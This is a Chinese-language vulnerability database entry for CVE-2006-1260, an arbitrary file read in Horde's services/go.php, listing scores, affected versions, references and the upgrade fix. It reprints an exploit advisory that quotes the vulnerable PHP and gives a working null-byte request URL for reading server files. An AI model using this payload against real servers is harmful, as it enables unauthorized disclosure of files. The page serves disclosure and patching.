CVE-2006-1260
CVSS5.0
发布时间 :2006-03-18 21:02:00
修订时间 :2011-03-07 21:32:35
NMCOES    

[原文]Horde Application Framework 3.0.9 allows remote attackers to read arbitrary files via a null character in the url parameter in services/go.php, which bypasses a sanity check.


[CNNVD]Horde应用框架go.php远程文件读取漏洞(CNNVD-200603-306)

        Horde Framework是个以PHP为基础的架构,用于创建网络应用程序。
        Horde在处理用户请求的参数值时存在漏洞,该漏洞源于/services/go.php文件不安全的调用了readfile()函数,远程攻击者可能利用此漏洞遍历服务器目录读取任意文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:horde:horde:2.2.1
cpe:/a:horde:horde:2.2.7
cpe:/a:horde:horde:3.0
cpe:/a:horde:horde:3.0.8
cpe:/a:horde:horde:2.2.6
cpe:/a:horde:horde:2.1
cpe:/a:horde:horde:3.0.7
cpe:/a:horde:horde:1.2.4
cpe:/a:horde:horde:3.0.4_rc2
cpe:/a:horde:horde:1.2.3
cpe:/a:horde:horde:1.2.2
cpe:/a:horde:horde:3.0.6
cpe:/a:horde:horde:2.2.8
cpe:/a:horde:horde:3.0.4_rc1
cpe:/a:horde:horde:2.0
cpe:/a:horde:horde:1.2.8
cpe:/a:horde:horde:1.2.7
cpe:/a:horde:horde:2.2.4_rc1
cpe:/a:horde:horde:3.0.1
cpe:/a:horde:horde:3.0.2
cpe:/a:horde:horde:1.2.6
cpe:/a:horde:horde:3.0.3
cpe:/a:horde:horde:2.1.3
cpe:/a:horde:horde:2.2.5
cpe:/a:horde:horde:2.2.3
cpe:/a:horde:horde:2.2.4
cpe:/a:horde:horde:2.2
cpe:/a:horde:horde:1.2
cpe:/a:horde:horde:2.2.9
cpe:/a:horde:horde:3.0.4
cpe:/a:horde:horde:1.2.1
cpe:/a:horde:horde:1.2.5
cpe:/a:horde:horde:3.0.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1260
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1260
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-306
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/25239
(PATCH)  XF  horde-servicesgo-information-disclosure(25239)
http://www.securityfocus.com/bid/17117
(PATCH)  BID  17117
http://www.osvdb.org/23918
(PATCH)  OSVDB  23918
http://securitytracker.com/id?1015771
(PATCH)  SECTRACK  1015771
http://secunia.com/advisories/19246
(VENDOR_ADVISORY)  SECUNIA  19246
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/043657.html
(VENDOR_ADVISORY)  FULLDISC  20060315 CodeScan Advisory: Unauthenticated Arbitrary File Read in Horde v3.09 and prior
http://www.vupen.com/english/advisories/2006/0959
(UNKNOWN)  VUPEN  ADV-2006-0959
http://www.securityfocus.com/archive/1/archive/1/427710/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060315 CodeScan Advisory: Unauthenticated Arbitrary File Read in Horde v3.09 and prior
http://www.novell.com/linux/security/advisories/2006_04_28.html
(UNKNOWN)  SUSE  SUSE-SR:2006:009
http://www.gentoo.org/security/en/glsa/glsa-200604-02.xml
(UNKNOWN)  GENTOO  GLSA-200604-02
http://www.debian.org/security/2006/dsa-1034
(UNKNOWN)  DEBIAN  DSA-1034
http://www.debian.org/security/2006/dsa-1033
(UNKNOWN)  DEBIAN  DSA-1033
http://securityreason.com/securityalert/590
(UNKNOWN)  SREASON  590
http://secunia.com/advisories/19897
(UNKNOWN)  SECUNIA  19897
http://secunia.com/advisories/19692
(UNKNOWN)  SECUNIA  19692
http://secunia.com/advisories/19619
(UNKNOWN)  SECUNIA  19619
http://secunia.com/advisories/19528
(UNKNOWN)  SECUNIA  19528

- 漏洞信息

Horde应用框架go.php远程文件读取漏洞
中危 输入验证
2006-03-18 00:00:00 2012-12-26 00:00:00
远程  
        Horde Framework是个以PHP为基础的架构,用于创建网络应用程序。
        Horde在处理用户请求的参数值时存在漏洞,该漏洞源于/services/go.php文件不安全的调用了readfile()函数,远程攻击者可能利用此漏洞遍历服务器目录读取任意文件。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        ftp://ftp.horde.org/pub/horde/horde-3.1.tar.gz

- 漏洞信息 (4850)

Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability (EDBID:4850)
php webapps
2008-01-06 Verified
0 Eugene Minaev
N/A [点击下载]
----[ Horde Web-Mail Remote File Disclosure ... ITDefence.ru Antichat.ru ]

							Horde Web-Mail Remote File Disclosure
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		At first look , this code is not vulnerable and we can only read remote files.
		
		<?php
		
		if (empty($_GET['url'])) {
		exit;
		}
		if (get_magic_quotes_gpc()) {
		$url = @parse_url(stripslashes($_GET['url']));
		} else {
		$url = @parse_url($_GET['url']);
		}  
		
		.....
		
		if ((!empty($_SERVER['SERVER_NAME']) &&
		$_SERVER['SERVER_NAME'] == $url['host']) ||
		(!empty($_SERVER['HTTP_HOST']) &&
		$_SERVER['HTTP_HOST'] == $url['host'])) { 
	 
		.....
		
		
		if (!empty($_GET['untrusted'])) {
		readfile($_GET['url']);
		exit;
		}  
		
		?>
		
		But parse_url is only a set of regular expressions and we can use nullbyte to deceive function.
		
		http://test1.ru/horde/util/go.php?untrusted=1&url=test.php%00http://another.host/

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

1st advisory: http://www.securityfocus.com/archive/1/427710/30/0/threaded

# milw0rm.com [2008-01-06]
		

- 漏洞信息

23918
Horde go.php url Parameter Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Horde contains a flaw that may lead to an unauthorized information disclosure. The issue is due to go.php not properly sanitizing user input supplied to the 'url' variable. Embedding a NULL character within the 'url' variable enables an attacker to control the variable passed to readfile() function leading to the reading of any file on the file system with the privileges of the web server resulting in a loss of confidentiality.

- 时间线

2006-03-14 Unknow
2006-03-15 Unknow

- 解决方案

Upgrade to version 3.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Horde Application Framework Go.PHP Information Disclosure Vulnerability
Input Validation Error 17117
Yes No
2006-03-15 12:00:00 2006-07-19 07:57:00
CodeScan Labs are credited with the discovery of this issue.

- 受影响的程序版本

SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SuSE SUSE Linux Enterprise Server 7
+ Linux kernel 2.4.19
S.u.S.E. UnitedLinux 1.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. SuSE Linux Open-Xchange 4.1
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Open-Enterprise-Server 1
S.u.S.E. Office Server
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Professional 7.3
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Openexchange Server
S.u.S.E. Linux Office Server
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux Database Server 0
S.u.S.E. Linux Connectivity Server
Horde Project Horde 3.0.9
Horde Project Horde 3.0.8
Horde Project Horde 3.0.7
Horde Project Horde 3.0.6
Horde Project Horde 3.0.4 -RC 2
Horde Project Horde 3.0.4 -RC 1
Horde Project Horde 3.0.4
Horde Project Horde 3.0.3
Horde Project Horde 3.0.2
Horde Project Horde 3.0.1
Horde Project Horde 3.0
Horde Project Horde 2.2.9
Horde Project Horde 2.2.8
Horde Project Horde 2.2.7
Horde Project Horde 2.2.6
Horde Project Horde 2.2.5
Horde Project Horde 2.2.4 -RC1
Horde Project Horde 2.2.4
Horde Project Horde 2.2.3
Horde Project Horde 2.2.1
Horde Project Horde 2.2
Horde Project Horde 2.1.3
Horde Project Horde 2.1
Horde Project Horde 2.0
Horde Project Horde 1.2.8
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
Horde Project Horde 1.2.7
Horde Project Horde 1.2.6
Horde Project Horde 1.2.5
Horde Project Horde 1.2.4
Horde Project Horde 1.2.3
Horde Project Horde 1.2.2
Horde Project Horde 1.2.1
Horde Project Horde 1.2
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Horde Project Horde 3.1

- 不受影响的程序版本

Horde Project Horde 3.1

- 漏洞讨论

Horde Application Framework is prone to an information-disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to retrieve the contents of arbitrary files in the context of the webserver process. Information obtained may aid in further attacks.

- 漏洞利用

Attackers can exploit this issue via a web client.

- 解决方案

The vendor has released version 3.1 to address this issue.

See the referenced vendor advisories for details on obtaining and applying the appropriate updates.


Horde Project Horde 1.2

Horde Project Horde 1.2.1

Horde Project Horde 1.2.2

Horde Project Horde 1.2.3

Horde Project Horde 1.2.4

Horde Project Horde 1.2.8

Horde Project Horde 2.0

Horde Project Horde 2.1

Horde Project Horde 2.1.3

Horde Project Horde 2.2.1

Horde Project Horde 2.2.3

Horde Project Horde 2.2.4

Horde Project Horde 2.2.4 -RC1

Horde Project Horde 2.2.5

Horde Project Horde 2.2.6

Horde Project Horde 2.2.7

Horde Project Horde 2.2.8

Horde Project Horde 2.2.9

Horde Project Horde 3.0

Horde Project Horde 3.0.1

Horde Project Horde 3.0.2

Horde Project Horde 3.0.3

Horde Project Horde 3.0.4 -RC 1

Horde Project Horde 3.0.4 -RC 2

Horde Project Horde 3.0.4

Horde Project Horde 3.0.6

Horde Project Horde 3.0.7

Horde Project Horde 3.0.8

Horde Project Horde 3.0.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站